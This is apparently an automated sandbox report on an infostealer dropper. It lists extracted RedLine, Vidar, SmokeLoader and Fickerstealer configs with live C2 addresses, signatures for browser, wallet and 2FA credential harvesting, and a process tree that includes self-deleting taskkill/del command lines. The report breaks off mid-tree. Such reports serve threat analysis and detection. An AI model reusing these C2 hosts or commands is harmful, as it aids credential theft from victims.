Resubmissions

11-07-2024 05:43

240711-gej4lstgrf 10

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

Analysis

  • max time kernel
    1802s
  • max time network
    1817s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-06-2021 01:11

General

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

865

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    865

Extracted

Family

vidar

Version

39.4

Botnet

932

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    932

Extracted

Family

fickerstealer

C2

bukkva.club:80

Signatures

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1288
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1456
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2428
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2320
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Modifies registry class
        PID:2656
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2436
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2272
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1864
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1396
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1148
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1064
                  • C:\Users\Admin\AppData\Roaming\bufaghe
                    C:\Users\Admin\AppData\Roaming\bufaghe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3980
                    • C:\Users\Admin\AppData\Roaming\bufaghe
                      C:\Users\Admin\AppData\Roaming\bufaghe
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:2768
                  • C:\Users\Admin\AppData\Roaming\edfaghe
                    C:\Users\Admin\AppData\Roaming\edfaghe
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    PID:5724
                  • C:\Users\Admin\AppData\Roaming\bufaghe
                    C:\Users\Admin\AppData\Roaming\bufaghe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:6104
                    • C:\Users\Admin\AppData\Roaming\bufaghe
                      C:\Users\Admin\AppData\Roaming\bufaghe
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:4828
                  • C:\Users\Admin\AppData\Roaming\edfaghe
                    C:\Users\Admin\AppData\Roaming\edfaghe
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    PID:2508
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:352
                  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (21).exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (21).exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:644
                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3280
                      • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\setup_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\setup_install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3100
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_1.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1284
                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_1.exe
                            arnatic_1.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:2188
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                              6⤵
                                PID:5876
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im arnatic_1.exe /f
                                  7⤵
                                  • Kills process with taskkill
                                  PID:2152
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  7⤵
                                  • Executes dropped EXE
                                  • Delays execution with timeout.exe
                                  PID:5096
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c arnatic_2.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1500
                            • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_2.exe
                              arnatic_2.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:3228
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c arnatic_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3128
                            • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_3.exe
                              arnatic_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Modifies registry class
                              • Suspicious use of WriteProcessMemory
                              PID:3736
                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                6⤵
                                • Loads dropped DLL
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2216
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c arnatic_5.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3720
                            • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_5.exe
                              arnatic_5.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4068
                              • C:\Users\Admin\AppData\Roaming\3522310.exe
                                "C:\Users\Admin\AppData\Roaming\3522310.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:1604
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 1604 -s 936
                                  7⤵
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4904
                              • C:\Users\Admin\AppData\Roaming\1629069.exe
                                "C:\Users\Admin\AppData\Roaming\1629069.exe"
                                6⤵
                                  PID:3744
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:860
                                • C:\Users\Admin\AppData\Roaming\2187558.exe
                                  "C:\Users\Admin\AppData\Roaming\2187558.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4128
                                • C:\Users\Admin\AppData\Roaming\4726236.exe
                                  "C:\Users\Admin\AppData\Roaming\4726236.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4304
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2152
                              • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_6.exe
                                arnatic_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:3244
                                • C:\Users\Admin\Documents\ppFABYK2fyjVjSETJ8tj3Fr0.exe
                                  "C:\Users\Admin\Documents\ppFABYK2fyjVjSETJ8tj3Fr0.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:4820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im ppFABYK2fyjVjSETJ8tj3Fr0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ppFABYK2fyjVjSETJ8tj3Fr0.exe" & del C:\ProgramData\*.dll & exit
                                    7⤵
                                      PID:5636
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im ppFABYK2fyjVjSETJ8tj3Fr0.exe /f
                                        8⤵
                                        • Kills process with taskkill
                                        PID:6132
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:5488
                                  • C:\Users\Admin\Documents\2fk2tk8Wg5rw5ugy63bRQ4oQ.exe
                                    "C:\Users\Admin\Documents\2fk2tk8Wg5rw5ugy63bRQ4oQ.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4808
                                    • C:\Users\Admin\Documents\2fk2tk8Wg5rw5ugy63bRQ4oQ.exe
                                      "C:\Users\Admin\Documents\2fk2tk8Wg5rw5ugy63bRQ4oQ.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:3980
                                  • C:\Users\Admin\Documents\99UTRbxelRoCnvb3O1VAChP1.exe
                                    "C:\Users\Admin\Documents\99UTRbxelRoCnvb3O1VAChP1.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:4884
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 99UTRbxelRoCnvb3O1VAChP1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\99UTRbxelRoCnvb3O1VAChP1.exe" & del C:\ProgramData\*.dll & exit
                                      7⤵
                                        PID:5492
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im 99UTRbxelRoCnvb3O1VAChP1.exe /f
                                          8⤵
                                          • Kills process with taskkill
                                          PID:6028
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:5132
                                    • C:\Users\Admin\Documents\XCzGe6LZqndms4sC8sYhTcyv.exe
                                      "C:\Users\Admin\Documents\XCzGe6LZqndms4sC8sYhTcyv.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5068
                                    • C:\Users\Admin\Documents\vAGTS3SFRbJnZNWi98vxCHg4.exe
                                      "C:\Users\Admin\Documents\vAGTS3SFRbJnZNWi98vxCHg4.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:5048
                                      • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                        "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1596
                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4316
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4964
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:5220
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:6016
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                              PID:392
                                          • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                            "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Modifies registry class
                                            PID:5076
                                            • C:\Windows\SysWOW64\rUNdlL32.eXe
                                              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                              8⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              PID:4388
                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Drops file in Program Files directory
                                            PID:5016
                                        • C:\Users\Admin\Documents\bicxSNS9t0PfzhpvSUkvQrds.exe
                                          "C:\Users\Admin\Documents\bicxSNS9t0PfzhpvSUkvQrds.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5024
                                        • C:\Users\Admin\Documents\6PU3ZbBEZcawpQh5XStwApFo.exe
                                          "C:\Users\Admin\Documents\6PU3ZbBEZcawpQh5XStwApFo.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4988
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                            7⤵
                                              PID:4648
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                8⤵
                                                • Checks processor information in registry
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4640
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4640.0.814523445\925495655" -parentBuildID 20200403170909 -prefsHandle 1396 -prefMapHandle 1372 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4640 "\\.\pipe\gecko-crash-server-pipe.4640" 1488 gpu
                                                  9⤵
                                                    PID:5304
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                7⤵
                                                • Enumerates system info in registry
                                                • Suspicious use of FindShellTrayWindow
                                                PID:5600
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdbc1a4f50,0x7ffdbc1a4f60,0x7ffdbc1a4f70
                                                  8⤵
                                                    PID:4080
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1532 /prefetch:2
                                                    8⤵
                                                      PID:3400
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1760 /prefetch:8
                                                      8⤵
                                                        PID:5508
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
                                                        8⤵
                                                          PID:5604
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
                                                          8⤵
                                                            PID:3740
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
                                                            8⤵
                                                              PID:3268
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
                                                              8⤵
                                                                PID:5876
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
                                                                8⤵
                                                                  PID:5576
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
                                                                  8⤵
                                                                    PID:5392
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                                                                    8⤵
                                                                      PID:2728
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
                                                                      8⤵
                                                                        PID:3940
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
                                                                        8⤵
                                                                          PID:2940
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
                                                                          8⤵
                                                                            PID:728
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2500 /prefetch:8
                                                                            8⤵
                                                                              PID:5944
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                                                                              8⤵
                                                                                PID:5456
                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                8⤵
                                                                                  PID:5108
                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6be25a890,0x7ff6be25a8a0,0x7ff6be25a8b0
                                                                                    9⤵
                                                                                      PID:5620
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5260
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5572 /prefetch:8
                                                                                      8⤵
                                                                                        PID:6116
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6208 /prefetch:8
                                                                                        8⤵
                                                                                          PID:6128
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:8
                                                                                          8⤵
                                                                                            PID:1284
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                            8⤵
                                                                                              PID:5232
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3500 /prefetch:8
                                                                                              8⤵
                                                                                                PID:5500
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
